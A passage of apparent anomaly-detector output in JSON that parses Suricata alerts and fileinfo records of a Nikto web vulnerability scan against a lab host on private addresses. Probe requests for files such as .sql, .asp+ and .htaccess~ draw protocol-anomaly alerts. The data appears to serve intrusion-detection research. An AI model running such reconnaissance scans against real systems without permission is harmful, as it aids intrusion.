192.168.10.154:80", "/parser/model/time": 1583349514.239413, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46852, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.239413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46852 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.sql", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.239713+0000\",\"flow_id\":499362946523941,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.239713, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":499362946523941,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.sql\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.sql\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.sql", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.sql", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46852, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":499362946523941,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 499362946523941, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.239713+0000\",\"flow_id\":499362946523941,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.241805 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46854 -> 192.168.10.154:80", "/parser/model/time": 1583349514.241805, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46854, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.241805 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46854 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.asp+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.242016+0000\",\"flow_id\":2006664539188459,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.242016, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2006664539188459,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.asp+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.asp+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.asp+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.asp+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46854, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2006664539188459,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2006664539188459, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.242016+0000\",\"flow_id\":2006664539188459,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.243409 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46856 -> 192.168.10.154:80", "/parser/model/time": 1583349514.243409, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46856, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.243409 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46856 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.htaccess~", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.243594+0000\",\"flow_id\":1380698825602070,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.243594, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1380698825602070,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.htaccess~\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.htaccess~\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.htaccess~", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.htaccess~", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46856, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1380698825602070,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1380698825602070, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 